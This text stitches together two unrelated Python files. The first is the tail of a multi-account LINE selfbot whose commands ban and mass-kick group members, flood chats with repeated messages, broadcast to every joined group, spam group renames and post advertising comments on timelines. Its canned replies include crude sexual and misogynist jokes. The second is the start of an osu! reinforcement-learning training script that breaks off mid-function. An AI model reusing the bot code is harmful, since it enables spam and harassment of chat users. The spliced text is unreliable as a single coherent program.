json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Succes Plak")
except:
random.choice(KAC).sendText(msg.to,"error")
#----------------Fungsi Banned User Target Start-----------------------#
elif "Banned @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Banned] Sukses"
_name = msg.text.replace("Banned @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Dilarang Banned Bot")
ki.sendText(msg.to,"Dilarang Banned Bot")
kk.sendText(msg.to,"Dilarang Banned Bot")
kc.sendText(msg.to,"Dilarang Banned Bot")
ks.sendText(msg.to,"Dilarang Banned Bot")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Akun telah sukses di banned")
except:
random.choice(KAC).sendText(msg.to,"Error")
#----------------Fungsi Banned User Target Finish-----------------------#
#----------------Mid via Tag--------------
elif "Mid @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
random.choice(KAC).sendText(msg.to, g.mid)
else:
pass
#-----------------------------------------
#----------------Fungsi Unbanned User Target Start-----------------------#
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Unban] Sukses"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Tidak Ditemukan.....")
ki.sendText(msg.to,"Tidak Ditemukan.....")
kk.sendText(msg.to,"Tidak Ditemukan.....")
kc.sendText(msg.to,"Tidak Ditemukan.....")
ks.sendText(msg.to,"Tidak Ditemukan.....")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Akun Bersih Kembali")
except:
ki.sendText(msg.to,"Error")
#----------------Fungsi Unbanned User Target Finish-----------------------#
#-------------Fungsi Spam Start---------------------#
elif msg.text in ["Up","up","Up Chat","Up chat","up chat","Upchat","upchat"]:
if msg.from_ in admin:
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
ks.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
ks.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
ks.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
ks.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
ks.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
ks.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
ks.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
ks.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
ks.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
ks.sendText(msg.to,"P squared up!")
#-------------Fungsi Spam Finish---------------------#
#-------------Fungsi Broadcast Start------------#
elif "Bc " in msg.text: #NgeBC Ke semua Group yang di Join :D
if msg.from_ in owner:
bctxt = msg.text.replace("Bc ","")
a = cl.getGroupIdsJoined()
a = ki.getGroupIdsJoined()
a = kk.getGroupIdsJoined()
a = kc.getGroupIdsJoined()
a = ks.getGroupIdsJoined()
for taf in a:
cl.sendText(taf, (bctxt))
ki.sendText(taf, (bctxt))
kk.sendText(taf, (bctxt))
kc.sendText(taf, (bctxt))
ks.sendText(taf, (bctxt))
#--------------Fungsi Broadcast Finish-----------#
elif msg.text in ["LG"]: #Melihat List Group
if msg.from_ in admin:
gids = cl.getGroupIdsJoined()
h = ""
for i in gids:
#####gn = cl.getGroup(i).name
h += "[•]%s Member\n" % (cl.getGroup(i).name +"👉"+str(len(cl.getGroup(i).members)))
cl.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
elif msg.text in ["LG2"]: #Melihat List Group + ID Groupnya (Gunanya Untuk Perintah InviteMeTo:)
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#--------------List Group------------
#------------ Keluar Dari Semua Group------
elif msg.text in ["Bot out","Red out"]:
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = kk.getGroupIdsJoined()
gid = kc.getGroupIdsJoined()
gid = ks.getGroupIdsJoined()
for i in gid:
ks.leaveGroup(i)
kc.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
cl.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sayonara")
else:
cl.sendText(msg.to,"He declined all invitations")
#------------------------End---------------------
#-----------------End-----------
elif msg.text in ["Red say hi"]:
ki.sendText(msg.to,"Hi buddy Har Har")
kk.sendText(msg.to,"Hi buddy Har Har")
kc.sendText(msg.to,"Hi buddy Har Har")
ks.sendText(msg.to,"Hi buddy Har Har")
#-----------------------------------------------
elif msg.text in ["ขอมุข"]:
ki.sendText(msg.to,"เชิญแอดบอทน้อยเลยคับเจ้านาย")
kk.sendText(msg.to,"มีหมดทั้งมุขทั้งแคปชงแคปชั่น")
kc.sendText(msg.to,"ไอกีไลน์👉@botnoi👈")
elif msg.text in ["นับ1-100","นับเลข"]:
ki.sendText(msg.to,"ตูเป็นบอทป้องกันนะ")
kk.sendText(msg.to,"ไม่ใช่บอทเล่นตลก")
kc.sendText(msg.to,"เดะปั๊ดตบหัวทิ่ม")
elif msg.text in ["สวย","น่ารัก","จีบ"]:
ki.sendText(msg.to,"สะดุดตา นับตั้งแต่ เมื่อแรกพบ")
kk.sendText(msg.to,"อยากจะคบ นับตั้งแต่ เมื่อแรกเห็น")
kc.sendText(msg.to,"อยากได้น้อง มาเคียงข้าง ตัวเป็นๆ")
cl.sendText(msg.to,"แม่เนื้อเย็น พี่รักเจ้า จนหมดใจ😬😬")
elif msg.text in ["แคปชั่น"]:
ki.sendText(msg.to,"ถึงหน้าตาจะไม่หล่อ")
kk.sendText(msg.to,"แต่ถ้าลองคบแล้วน้องจะติดใจ")
kc.sendText(msg.to,"อ๊วกแพพ...😂😂")
elif msg.text in ["รับแขก"]:
ki.sendText(msg.to,"สวัสดีคับคนมาใหม่")
kc.sendText(msg.to,"มาใหม่แก้ผ้าด้วยนะ555+!")
#-----------------------------------------------
#-----------------------------------------------
#-------------ข้อความทักทาย Start---------------------#
elif msg.text in ["ทักทาย","หวัดดี","มอนิ่ง"]:
ki.sendText(msg.to,"หวัดดีเพื่อนๆรอบห้อง")
kk.sendText(msg.to,"หวัดดีแอด")
kc.sendText(msg.to,"หวัดดีรอง")
ks.sendText(msg.to,"ฝากเนื้อฝากตัวด้วยนะทุกคน..😉😉")
#-------------ข้ออความทักทาย Finish---------------------#
#-----------------------------------------------
#-------------Redbot Respon Start-----------------------#
elif msg.text in ["Absen","respon","เชคบอท","Respon"]:
#if msg.from_ in admin:
cl.sendText(msg.to,"เซลบอท On")
ki.sendText(msg.to,"คิก1 On")
kk.sendText(msg.to,"คิก2 On")
kc.sendText(msg.to,"คิก3 On")
ks.sendText(msg.to,"คิก4 On")
cl.sendText(msg.to,"Redsamuribot\nพร้อมรับคำสั่ง!!\nมีอะไรให้รับใช้เชิญสั่งการได้เลยคับนายหัว👍")
#-------------Redbot Respon Finish---------------------#
#-------------Fungsi Balesan Respon Start---------------------#
elif msg.text in ["Ini Apa","ini apa","Apaan Ini","apaan ini"]:
ki.sendText(msg.to,"Ya gitu deh intinya mah questioning")
#-------------Fungsi Balesan Respon Finish---------------------#
#-------------Fungsi Speedbot Start---------------------#
elif msg.text in ["Speed","Sp"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "ความเร็วรอบเอว...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sต่อวินาที" % (elapsed_time))
#-------------Fungsi Speedbot Finish---------------------#
#-------------Fungsi Banned Send Contact Start------------------#
elif msg.text in ["Ban"]:
if msg.from_ in owner:
wait["wblacklist"] = True
cl.sendText(msg.to,"Sent contact")
ki.sendText(msg.to,"Sent contact")
kk.sendText(msg.to,"Sent contact")
kc.sendText(msg.to,"Sent contact")
ks.sendText(msg.to,"Sent contact")
elif msg.text in ["Unban"]:
if msg.from_ in owner:
wait["dblacklist"] = True
cl.sendText(msg.to,"Sent contact")
ki.sendText(msg.to,"Sent contact")
kk.sendText(msg.to,"Sent contact")
kc.sendText(msg.to,"Sent contact")
ks.sendText(msg.to,"Sent contact")
#-------------Fungsi Banned Send Contact Finish------------------#
elif msg.text in ["Creator"]:
msg.contentType = 13
msg.contentMetadata = {'mid': 'ued156c86ffa56024c0acba16f7889e6d'}
cl.sendText(msg.to,"======================")
cl.sendMessage(msg)
cl.sendText(msg.to,"======================")
cl.sendText(msg.to,"ผู้สร้างRedsamuribot 😜")
#-------------Fungsi Chat ----------------
elif msg.text in ["Woy","woy","Woi","woi","bot","Bot"]:
quote = ['Istri yang baik itu Istri yang Mengizinkan Suaminya untuk Poligami 😂😂😂.','Kunci Untuk Bikin Suami Bahagia itu cuma satu..\nIzinkan Suamimu Untuk Selingkuh Coyyy ','Ah Kupret Lu','Muka Lu Kaya Jamban','Ada Orang kah disini?','Sange Euy','Ada Perawan Nganggur ga Coy?']
psn = random.choice(quote)
cl.sendText(msg.to,psn)
#-------------Fungsi Bannlist Start------------------#
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
random.choice(KAC).sendText(msg.to,"ห้องนี้ไม่มีรายการที่ถูกแบน")
else:
random.choice(KAC).sendText(msg.to,"Blacklist user")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Bannlist Finish------------------#
elif msg.text in ["Cek ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
random.choice(KAC).sendText(msg.to,cocoa + "")
elif msg.text in ["Kill ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
elif msg.text in ["Clear"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif "random: " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
strnum = msg.text.replace("random: ","")
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
try:
num = int(strnum)
group = cl.getGroup(msg.to)
for var in range(0,num):
name = "".join([random.choice(source_str) for x in xrange(10)])
time.sleep(0.01)
group.name = name
cl.updateGroup(group)
except:
cl.sendText(msg.to,"Error")
elif "albumat'" in msg.text:
try:
albumtags = msg.text.replace("albumat'","")
gid = albumtags[:6]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "created an album")
except:
cl.sendText(msg.to,"Error")
elif "fakecat'" in msg.text:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
anu = msg.text.replace("fakecat'","")
cl.sendText(msg.to,str(cl.channel.createAlbum(msg.to,name,anu)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
#---------CCTV-----------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n[•]" + Name
wait2['ROM'][op.param1][op.param2] = "[•]" + Name
else:
cl.sendText
except:
pass
#---------------------
if op.type == 17:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
random.choice(KAC).sendText(op.param1, "ยินดีต้อนรับ สู่กลุ่ม " + str(ginfo.name))
random.choice(KAC).sendText(op.param1, "ผู้สร้างกลุ่ม👉 " + str(ginfo.name) + " :\n" + ginfo.creator.displayName)
random.choice(KAC).sendText(op.param1,"เข้ามาแล้วดูที่โน๊ตกลุ่มด้วยนะ !!! 😊\nอย่าลืมปิดเสียงแจ้งเตือนล่ะ 😘")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 15:
if op.param2 in Bots:
return
random.choice(KAC).sendText(op.param1, "Baper Tuh Orang :v ")
print "MEMBER HAS LEFT THE GROUP"
#------------------------
if op.type == 59:
print op
except Exception as error:
print error
def a2():
    """Return False on every 10-minute mark (minute 00/10/.../50), True otherwise.

    Bug fix: ``nowT`` is the two-character minute string ("00".."59"), so the
    original slice ``nowT[14:]`` was always empty and the function always
    returned True. Compare the minute string itself instead.
    """
    now2 = datetime.now()
    nowT = datetime.strftime(now2, "%M")
    return nowT not in ["10", "20", "30", "40", "50", "00"]
def autolike():
    """Scan the latest 500 timeline posts and, for each not-yet-liked one,
    like and comment on it from all five bot accounts (cl, ki, kk, kc, ks).

    NOTE(review): relies on module-level LINE clients defined earlier in the
    file; likeType=1001 appears to be a LINE reaction code -- confirm against
    the client library.
    """
    for zx in range(0,500):
        # A fresh activity fetch per index; presumably could be hoisted out of
        # the loop -- left unchanged (doc-only edit).
        hasil = cl.activity(limit=500)
        if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
            try:
                cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
                cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉Auto Like by ⭐⭐Red⭐⭐👈\n\n™Redsamuri selfbot™")
                ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
                ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"บอทกดไลค์ให้แล้วนะ\n\n กดไลค์เค้ากลับด้วยนะตะเอง😊")
                kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
                kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"บอทกดไลค์ให้แล้วนะ\n\n กดไลค์เค้ากลับด้วยนะตะเอง😊")
                kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
                kc.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"บอทกดไลค์ให้แล้วนะ\n\n กดไลค์เค้ากลับด้วยนะตะเอง😊")
                ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
                ks.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"บอทกดไลค์ให้แล้วนะ\n\n กดไลค์เค้ากลับด้วยนะตะเอง😊")
                cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"=====Ready=====\n[★]Bot Protect For Group\n[★]\n[★]Selfbot in Your Account[★]\n- 1 Selfbot 1 Bot Assist\n- 1 Selfbot 2 Bot Assist\n- 1 Selfbot 3 Bot Assist\n- 1 Selfbot 4 Bot Assist\n- 1 Selfbot 5 Bot Assist\nId Line Samuri5\n===[★]Redsamuri Bot Protect[★]===")
                print "Like"
            # Network/API failures on a single post are skipped silently.
            except:
                pass
        else:
            print "Already Liked"
        time.sleep(0.01)
#thread3 = threading.Thread(target=autolike)
#thread3.daemon = True
#thread3.start()
#--------------------
def likePost():
    """Like (likeType=1002) and comment on up to 500 not-yet-liked timeline
    posts, but only for posts authored by a mid listed in ``owner``.

    NOTE(review): relies on module-level LINE clients cl/ki/kk/kc/ks and the
    ``owner`` collection defined earlier in the file.
    """
    for zx in range(0,500):
        hasil = cl.activity(limit=500)
        if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
            # Only react to posts made by an owner account.
            if hasil['result']['posts'][zx]['userInfo']['mid'] in owner:
                try:
                    cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
                    ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
                    kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
                    kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
                    ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
                    cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Auto like by Redsamuri Bot")
                    cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"=====Ready=====\n[★]Bot Protect For Group\n[★]\n[★]Selfbot in Your Account[★]\n- 1 Selfbot 1 Bot Assist\n- 1 Selfbot 2 Bot Assist\n- 1 Selfbot 3 Bot Assist\n- 1 Selfbot 4 Bot Assist\n- 1 Selfbot 5 Bot Assist\nId Line samuri5\n===[★]Redsamuri Bot Protect[★]===")
                    print "Like"
                # Failures on a single post are ignored on purpose.
                except:
                    pass
        else:
            print "Status Sudah di Like Plak"
def nameUpdate():
    """Background worker: while wait["clock"] is True, re-apply the configured
    display names (wait["cName"] .. wait["cName5"]) to the five bot accounts,
    then sleep 10 minutes before the next pass.

    Fixes:
        * The fifth update called ``ks.updateProfile(profile5a)`` -- an
          undefined name (typo for ``profile5``), whose NameError was
          silently swallowed by the bare except, so the fifth account's
          name was never written.
        * Removed the unused ``now2``/``nowT`` clock variables (dead code
          left over from a clock-in-name feature).
    """
    while True:
        try:
            if wait["clock"] == True:
                profile = cl.getProfile()
                profile.displayName = wait["cName"]
                cl.updateProfile(profile)
                profile2 = ki.getProfile()
                profile2.displayName = wait["cName2"]
                ki.updateProfile(profile2)
                profile3 = kk.getProfile()
                profile3.displayName = wait["cName3"]
                kk.updateProfile(profile3)
                profile4 = kc.getProfile()
                profile4.displayName = wait["cName4"]
                kc.updateProfile(profile4)
                profile5 = ks.getProfile()
                profile5.displayName = wait["cName5"]
                ks.updateProfile(profile5)  # was: profile5a (NameError)
                time.sleep(600)
        except:
            # Best effort: network/profile errors must not kill the worker.
            pass
# Start the display-name refresher in the background; daemon=True so it dies
# with the main process.
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
# Main long-polling loop: fetch up to 5 operations per call, track the highest
# revision seen, and dispatch each operation to bot().
while True:
    try:
        Ops = cl.fetchOps(cl.Poll.rev, 5)
    except EOFError:
        raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
    for Op in Ops:
        if (Op.type != OpType.END_OF_OPERATION):
            cl.Poll.rev = max(cl.Poll.rev, Op.revision)
            bot(Op)
|
main.py
|
import pickle
from random import random
import torch
import time
import pyautogui
import gc
import numpy as np
from threading import Thread
from tqdm import tqdm
import environment
from trainer import QTrainer, RainbowTrainer, TaikoTrainer
torch.set_printoptions(sci_mode=False)
# Disable pyautogui's built-in pacing so synthetic inputs fire without delays.
pyautogui.MINIMUM_DURATION = 0.0
pyautogui.MINIMUM_SLEEP = 0.0
pyautogui.PAUSE = 0.0
# Training hyper-parameters.
BATCH_SIZE = 32
LEARNING_RATE = 0.00005 # Double DQN: 0.00025, Prioritized Replay -> Double DQN / 4
GAMMA = 0.999
MAX_STEPS = 25000
# Capture geometry and discretisation of the mouse action space.
WIDTH = 878
HEIGHT = 600
STACK_SIZE = 4
DISCRETE_FACTOR = 10
X_DISCRETE = 685 // DISCRETE_FACTOR + 1
Y_DISCRETE = (560 - 54) // DISCRETE_FACTOR + 1
PIXEL_SKIP = 4
# Run on GPU when available, CPU otherwise.
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def print_infos():
    """Log the discretised action-space dimensions derived from the module
    constants X_DISCRETE / Y_DISCRETE / DISCRETE_FACTOR."""
    infos = [
        'Discretized x: ' + str(X_DISCRETE),
        'Discretized y: ' + str(Y_DISCRETE),
        'Action dim: ' + str(X_DISCRETE * Y_DISCRETE * 4),
        'X_MAX = ' + str(145 + (X_DISCRETE - 1) * DISCRETE_FACTOR),
        'YMAX = ' + str(54 + 26 + (Y_DISCRETE - 1) * DISCRETE_FACTOR),
    ]
    for info in infos:
        print(info)
def log_episodes(i, q_trainer, steps, delta_t, k): # TODO : Make a logging utils and use log function
    """Periodic console/plot logging for the Q-learning training loop.

    Args:
        i: episode index (0-based).
        q_trainer: trainer holding the plotters and the epsilon scheduler.
        steps: number of steps executed in the episode that just finished.
        delta_t: wall-clock duration of that episode in seconds.
        k: global time-step counter (drives the epsilon schedule).
    """
    # Step-rate log for the first two episodes and then every 30th.
    if i <= 1 or i % 30 == 0:
        print(str(steps) + ' steps in ' + str(delta_t) + ' s.' + ' --> %.4f' % (steps / delta_t) + ' steps / s')
    if i > 0 and i % 50 == 0:
        q_trainer.avg_reward_plotter.fit()
        q_trainer.avg_reward_plotter.show()
    # Persist plot snapshots every 250 episodes.
    if i > 0 and i % 250 == 0:
        q_trainer.plotter.fig.savefig('average_loss' + str(i) + '.png')
        q_trainer.avg_reward_plotter.fig.savefig('episode_reward' + str(i) + '.png')
    if i % 30 == 0:
        print("Episode %d" % (i+1))
        print("Time step %d" % k)
        print("Schedule: %f" % q_trainer.scheduler.value(k))
def trainQNetwork(episode_nb, learning_rate, batch_size=BATCH_SIZE, load_weights=None, save_name='tests',
                  beatmap_name=None, star=1, evaluation=False, human_off_policy=False, load_memory=None, no_fail=False,
                  initial_p=1.0, end_p=0.05, decay_p=2000000, target_update=30000, init_k=0, min_experience=25000):
    """Train (or evaluate) the double-DQN agent on the osu! environment.

    Args:
        episode_nb: number of episodes to run.
        learning_rate: optimizer learning rate (forced to 0.0 in evaluation).
        batch_size, load_weights, load_memory, min_experience: replay/trainer setup.
        save_name / beatmap_name: used to build the checkpoint file prefix.
        star, no_fail: environment (beatmap) selection options.
        evaluation: if True, act greedily and do not learn.
        human_off_policy: if True, observe human play via env.observe()
            instead of acting with the agent.
        initial_p, end_p, decay_p: epsilon schedule endpoints and decay steps.
        target_update: global steps between target-network syncs.
        init_k: initial value of the global step counter (for resuming).
    """
    print_infos()
    if evaluation:
        learning_rate = 0.0
    env = environment.OsuEnv(X_DISCRETE, Y_DISCRETE, DISCRETE_FACTOR, WIDTH, HEIGHT, STACK_SIZE, star=star,
                             beatmap_name=beatmap_name, no_fail=no_fail, skip_pixels=PIXEL_SKIP)
    q_trainer = QTrainer(env, batch_size=batch_size, lr=learning_rate, gamma=GAMMA, initial_p=initial_p, end_p=end_p,
                         decay_p=decay_p, load_weights=load_weights, load_memory=load_memory,
                         min_experience=min_experience, gradient_clipping_norm=10.0)
    episode_average_reward = 0.0
    # k is the global time-step counter across all episodes.
    k = init_k
    reward = torch.tensor(0.0, device=device)
    for i in range(episode_nb):
        controls_state, state = env.reset(reward)
        env.launch_episode(reward)
        episode_reward = 0.0
        thread = None
        start = time.time()
        for steps in range(MAX_STEPS):
            previous_t = time.time()
            k += 1
            with torch.no_grad():
                if not human_off_policy:
                    if evaluation: # Choose greedy policy if tests
                        action = q_trainer.select_action(state, controls_state)
                    else: # Else choose an epsilon greedy policy with decaying epsilon
                        # Act fully randomly until min_experience steps collected.
                        if k > min_experience:
                            sample = random()
                            if sample > q_trainer.scheduler.value(k):
                                action = q_trainer.select_action(state, controls_state)
                            else:
                                action = q_trainer.random_action(X_DISCRETE, Y_DISCRETE)
                        else:
                            action = q_trainer.random_action(X_DISCRETE, Y_DISCRETE)
                    new_state, new_controls_state, reward, done = env.step(action, steps)
                else:
                    # Off-policy: record the human's action instead of acting.
                    action, new_state, new_controls_state, reward, done = env.observe(steps)
            if done:
                # Terminal transitions are stored with new_state = None.
                new_state = None
            else:
                # Push the transition asynchronously to keep the frame loop fast.
                th = Thread(target=q_trainer.memory.push,
                            args=(state, action, reward, new_state, controls_state, new_controls_state))
                th.start()
            # Wait for the previous optimize step before launching the next one.
            if thread is not None:
                thread.join()
            thread = Thread(target=q_trainer.optimize)
            thread.start()
            state = new_state
            controls_state = new_controls_state
            episode_reward += reward
            #busy_wait(freq=12.0, previous_t=previous_t)
            if done:
                break
        end = time.time()
        delta_t = end - start
        gc.collect()
        episode_average_reward += episode_reward
        q_trainer.avg_reward_plotter.step(episode_reward)
        log_episodes(i, q_trainer, steps, delta_t, k)
        # Sync the target network every target_update global steps.
        if k % target_update == 0:
            q_trainer.target_q_network.load_state_dict(q_trainer.q_network.state_dict())
        # Report and checkpoint every 30 episodes.
        if i % 30 == 0 and i > 0:
            print('Mean reward over last 30 episodes: ')
            print(episode_average_reward / 30)
            episode_average_reward = 0.0
            if beatmap_name is not None:
                tmp = beatmap_name + save_name
            else:
                tmp = save_name
            q_trainer.save_model(tmp, num=i)
    # Final checkpoint if the last episode did not land on a save boundary.
    # NOTE(review): the modulus here is 15 while the in-loop save uses 30 --
    # looks like a stale constant; confirm intended save cadence.
    if (episode_nb - 1) % 15 != 0:
        if beatmap_name is not None:
            tmp = beatmap_name + save_name
        else:
            tmp = save_name
        q_trainer.save_model(tmp, num=episode_nb - 1)
    q_trainer.plotter.fig.savefig('average_loss' + str(episode_nb-1) + '.png')
    q_trainer.avg_reward_plotter.fig.savefig('average_reward' + str(episode_nb-1) + '.png')
    print('k: %d' % k)
    env.stop()
def RainbowManiaTrain(lr=0.0000625, batch_size=32, gamma=0.999, omega=0.5, beta=0.4, sigma=0.1, eps=1.5e-4, n=3, atoms=51,
                      max_timestep=int(5e7), learn_start=80000, stack_size=4, norm_clip=10.0, save_freq=50000,
                      model_save_path='weights/Rainbow_test', memory_save_path='weights/memory.zip', target_update_freq=80000,
                      star=4, beatmap_name=None, width=380, height=600, skip_pixels=4, num_actions=128, no_fail=False,
                      load_weights=None, load_memory=None, Vmin=-10, Vmax=10, resume_start=0, load_stats=None,
                      save_stats='./stats.pkl', learning_freq=1, load_optimizer=None, optimizer_path='weights/opti.pt',
                      evaluation=False, data_efficient=False):
    """Train a Rainbow-DQN agent on the osu!mania environment.

    Timestep-driven loop: one env.step per iteration, with episode
    bookkeeping (plots, stats, checkpoints) performed lazily at episode
    boundaries. Learning starts after ``learn_start`` steps and runs every
    ``learning_freq`` steps unless ``evaluation`` is set.

    Bug fix: the observation returned by ``env.step`` (``next_state``) was
    never assigned back to ``state``, so the agent kept selecting actions
    from -- and storing frames of -- the initial reset observation for the
    whole episode. ``state = next_state`` now advances it each step.
    """
    # Linear schedule that anneals the prioritized-replay importance weight to 1.
    priority_weight_increase = (1 - beta) / (max_timestep - learn_start - resume_start)
    env = environment.ManiaEnv(height=height, width=width, stack_size=stack_size, star=star, beatmap_name=beatmap_name,
                               num_actions=num_actions, skip_pixels=skip_pixels, no_fail=no_fail)
